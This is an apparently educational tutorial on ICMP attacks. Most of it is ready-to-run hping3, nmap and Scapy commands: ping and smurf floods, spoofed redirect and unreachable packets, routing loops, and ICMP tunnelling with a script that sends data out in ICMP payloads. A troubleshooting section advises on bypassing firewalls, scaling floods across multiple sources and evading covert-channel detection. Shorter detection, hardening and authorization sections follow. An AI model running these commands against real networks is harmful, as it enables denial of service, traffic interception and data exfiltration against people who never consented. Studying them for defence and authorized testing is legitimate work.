ICMP Attacks

Understanding ICMP Attacks - Control Protocol Exploitation

What is ICMP Attacks?

Simple Definition: ICMP attacks exploit the Internet Control Message Protocol to manipulate network routing, overwhelm systems with traffic, or gather intelligence about network infrastructure by abusing messages meant for network diagnostics and error reporting.

Technical Definition: ICMP attacks leverage Internet Control Message Protocol vulnerabilities to perform reconnaissance, traffic redirection, denial of service, or network topology manipulation through crafted ICMP messages that exploit trust relationships in network protocol implementations.

Why ICMP Attacks Work

ICMP attacks succeed due to protocol design characteristics and implementation weaknesses:

  • Administrative Trust: ICMP messages are often trusted as legitimate network management traffic
  • No Authentication: ICMP protocol lacks authentication mechanisms for message validation
  • Automatic Processing: Systems automatically process many ICMP message types without verification
  • Routing Integration: ICMP redirect messages can modify system routing tables dynamically

Attack Process Breakdown

Normal ICMP Operation

  1. Error Reporting: Network devices send ICMP messages to report delivery problems
  2. Path Discovery: Systems use ICMP for MTU discovery and route optimization
  3. Network Diagnostics: Administrators use ping and traceroute for troubleshooting
  4. Router Communication: Devices exchange ICMP redirects for routing efficiency

ICMP Attack Exploitation

  1. Message Crafting: Attacker creates malicious ICMP packets with specific types and codes
  2. Target Injection: Send crafted messages to victims or intermediate systems
  3. System Response: Targets process ICMP messages and modify behavior accordingly
  4. Attack Achievement: Accomplish reconnaissance, DoS, or traffic redirection objectives

Real-World Impact

Network Reconnaissance: Discover active hosts, network topology, and system information through ICMP probing

Traffic Redirection: Force victims to route traffic through attacker-controlled systems using ICMP redirects

Denial of Service: Overwhelm targets with ICMP flood attacks or exhaust resources through protocol abuse

Firewall Bypass: Use ICMP tunneling to bypass network security controls and establish covert channels

Router Manipulation: Modify routing tables on network devices through crafted ICMP messages

Technical Concepts

ICMP Message Structure

ICMP Header Components:

  • Type: Message category (8 bits)
  • Code: Specific message subtype (8 bits)
  • Checksum: Header integrity verification (16 bits)
  • Rest of Header: Type-specific data (32 bits)

Common ICMP Message Types

Type 0 - Echo Reply: Response to ping requests Type 3 - Destination Unreachable: Various unreachability conditions Type 5 - Redirect: Route change notifications Type 8 - Echo Request: Ping request messages Type 11 - Time Exceeded: TTL expiration notifications Type 30 - Traceroute: Path discovery messages

Attack Categories

Information Gathering: Host discovery, OS fingerprinting, network mapping Traffic Manipulation: Routing redirection, man-in-the-middle positioning Denial of Service: Bandwidth exhaustion, resource depletion Covert Communications: Data exfiltration, command and control channels

Technical Implementation

Prerequisites

Network Requirements:

  • Raw socket access for ICMP packet crafting
  • Understanding of target network topology
  • Knowledge of ICMP filtering policies

Essential Tools:

  • Hping3: Advanced ICMP packet crafting and flooding
  • Nmap: ICMP-based host discovery and OS detection
  • Scapy: Custom ICMP packet creation and analysis
  • Ping: Basic ICMP echo request testing

Essential Command Sequence

Step 1: ICMP Reconnaissance and Host Discovery 

# Basic host discovery using ICMP
nmap -sn 192.168.1.0/24
# -sn: Host discovery without port scanning
# Uses ICMP echo requests to identify active hosts
# Reveals network topology and responsive systems

# ICMP timestamp request for information gathering
hping3 -c 1 -C 13 192.168.1.100
# -C 13: ICMP timestamp request (Type 13)
# Reveals system time and timezone information
# Can identify system type and configuration

# ICMP address mask request
hping3 -c 1 -C 17 192.168.1.100
# -C 17: ICMP address mask request (Type 17)
# May reveal subnet mask information
# Useful for network topology discovery

Purpose: Gather intelligence about target networks and identify systems that respond to various ICMP message types.

Step 2: ICMP Flood Attacks 

# Basic ICMP flood (ping flood)
hping3 -1 --flood 192.168.1.100
# -1: ICMP mode
# --flood: Send packets as fast as possible
# Overwhelms target with ICMP echo requests

# Controlled ICMP flood with specific rate
hping3 -1 -i u100 192.168.1.100
# -i u100: Send packet every 100 microseconds
# More controlled than --flood option
# Allows fine-tuning of attack intensity

# Large ICMP packet flood
hping3 -1 -d 65500 192.168.1.100
# -d 65500: Maximum payload size
# Forces target to process large packets
# Increases resource consumption per packet

Purpose: Test target system resilience to ICMP-based denial of service attacks.

Step 3: ICMP Redirect Attacks 

# ICMP redirect to change victim's routing
hping3 -c 1 -C 5 -K 1 -a 192.168.1.1 192.168.1.100
# -C 5: ICMP redirect message (Type 5)
# -K 1: Redirect code (host redirect)
# -a: Spoof source as legitimate gateway
# Forces victim to route traffic through attacker

# Monitor routing table changes on victim
# From victim system:
route -n
# Check for new routes added by ICMP redirects
# Verify redirection effectiveness

Custom ICMP Redirect with Scapy:

#!/usr/bin/env python3
from scapy.all import *

# Craft ICMP redirect packet
redirect = IP(src="192.168.1.1", dst="192.168.1.100")/\
           ICMP(type=5, code=1, gw="192.168.1.50")/\
           IP(src="192.168.1.100", dst="8.8.8.8")/\
           ICMP()

# Send redirect to victim
send(redirect)

Step 4: ICMP Unreachable Attacks 

# Destination unreachable to break connections
hping3 -c 5 -C 3 -K 4 192.168.1.100
# -C 3: Destination unreachable (Type 3)
# -K 4: Port unreachable code
# Disrupts UDP-based communications

# Host unreachable to isolate systems
hping3 -c 1 -C 3 -K 1 -a 192.168.1.1 192.168.1.100
# -K 1: Host unreachable code
# Spoofed from gateway to appear legitimate
# May cause systems to mark routes as down

Step 5: ICMP Tunneling and Covert Channels 

# ICMP tunnel for data exfiltration
# Using ptunnel (if available)
ptunnel -p 192.168.1.100 -lp 8080 -da 10.0.0.100 -dp 80
# -p: Proxy server (compromised host)
# Tunnels traffic through ICMP packets
# Bypasses firewalls that allow ICMP

# Manual ICMP data transmission
echo "SECRET_DATA" | hping3 -1 -E /dev/stdin 192.168.1.100
# -E: Read data from file/stdin
# Embeds data in ICMP payload
# Simple covert channel implementation

Custom ICMP Data Exfiltration:

#!/usr/bin/env python3
from scapy.all import *
import base64

# Encode data in ICMP packets
secret_data = "Sensitive information"
encoded_data = base64.b64encode(secret_data.encode()).decode()

# Split data across multiple ICMP packets
chunk_size = 32
for i in range(0, len(encoded_data), chunk_size):
    chunk = encoded_data[i:i+chunk_size]
    packet = IP(dst="192.168.1.100")/ICMP()/chunk
    send(packet)

Attack Variations

ICMP Fragmentation Attacks 

# Fragmented ICMP for evasion
hping3 -1 -f -d 1500 192.168.1.100
# -f: Fragment packets
# Large fragmented ICMP packets
# May bypass simple packet filters

# Overlapping fragment attack
hping3 -1 --frag 8 -d 1000 192.168.1.100
# --frag 8: Set fragment offset
# Create overlapping fragments
# Exploit reassembly vulnerabilities

ICMP Amplification Attacks 

# Smurf attack using broadcast
hping3 -1 -a 192.168.1.100 192.168.1.255
# Spoof victim's IP as source
# Send to broadcast address
# All hosts reply to victim (amplification)

# Directed broadcast attack
for net in 192.168.{1..10}.255; do
    hping3 -c 1 -1 -a 192.168.1.100 $net
done
# Target multiple broadcast addresses
# Maximize amplification effect

OS Fingerprinting via ICMP 

# ICMP-based OS detection
nmap -O --osscan-guess 192.168.1.100
# Uses ICMP responses for OS identification
# Analyzes TTL, window size, and response patterns

# Manual ICMP fingerprinting
hping3 -c 1 -1 192.168.1.100
# Analyze TTL values:
# Linux: 64, Windows: 128, Cisco: 255
# Response timing and patterns reveal OS type

Common Issues and Solutions

Problem: ICMP packets blocked by firewall

  • Solution: Try different ICMP types, use fragmentation, or tunnel through allowed protocols

Problem: No response to ICMP redirects

  • Solution: Verify target accepts redirects, ensure spoofed source is trusted gateway

Problem: ICMP flood not effective

  • Solution: Increase packet rate, use larger payloads, or coordinate from multiple sources

Problem: Covert channel detected

  • Solution: Reduce transmission frequency, vary packet sizes, encrypt payloads

Advanced Techniques

ICMP Route Manipulation 

# Create routing loops with ICMP redirects
hping3 -c 1 -C 5 -K 1 -a 192.168.1.1 192.168.1.100 &
hping3 -c 1 -C 5 -K 1 -a 192.168.1.100 192.168.1.1 &
# Create mutual redirects between systems
# Can cause routing loops and network disruption

Time-Based ICMP Attacks 

# ICMP timestamp manipulation
# Craft packets with modified timestamps
# Can affect time-sensitive applications
# Useful for protocol-specific attacks

# Delayed ICMP responses
hping3 -1 -i 60 192.168.1.100
# -i 60: 60-second intervals
# Slow, stealthy reconnaissance
# Avoids triggering rate-limiting

Multi-Protocol ICMP Integration 

# Combine ICMP with other protocols
# Use ICMP for reconnaissance
nmap -sn 192.168.1.0/24
# Follow with TCP scanning on discovered hosts
nmap -sS $(nmap -sn 192.168.1.0/24 | grep -oP '\d+\.\d+\.\d+\.\d+')

Detection and Prevention

Detection Indicators

  • Unusual ICMP traffic patterns or volumes
  • ICMP packets with suspicious source addresses
  • Unexpected routing table changes
  • ICMP packets containing non-standard payloads
  • High-rate ICMP traffic from single sources

Prevention Measures

Network Configuration:

  • Disable ICMP redirects on hosts and routers
  • Implement ICMP rate limiting
  • Filter unnecessary ICMP types at network borders
  • Block ICMP to/from external networks when not needed

Monitoring and Alerting:

  • Log and analyze ICMP traffic patterns
  • Monitor for routing table changes
  • Detect ICMP flood attacks with rate thresholds
  • Analyze ICMP payload content for covert channels

System Hardening:

  • Configure systems to ignore ICMP redirects
  • Implement proper ICMP filtering on firewalls
  • Use stateful inspection for ICMP traffic
  • Deploy intrusion detection systems with ICMP analysis

Professional Context

Legitimate Use Cases

  • Network Troubleshooting: Testing connectivity and diagnosing network issues
  • Security Assessment: Validating ICMP filtering and response handling
  • Performance Testing: Measuring network latency and MTU discovery
  • Infrastructure Mapping: Understanding network topology and routing

Legal and Ethical Requirements

Authorization: ICMP attacks can disrupt network operations - explicit permission required

Scope Limitation: Define acceptable ICMP testing within authorized network segments

Impact Assessment: Document potential for service disruption and routing changes

Monitoring Considerations: Ensure testing doesn’t interfere with legitimate network management

ICMP attacks demonstrate the importance of proper network protocol security and the need for comprehensive filtering and monitoring of control protocol traffic.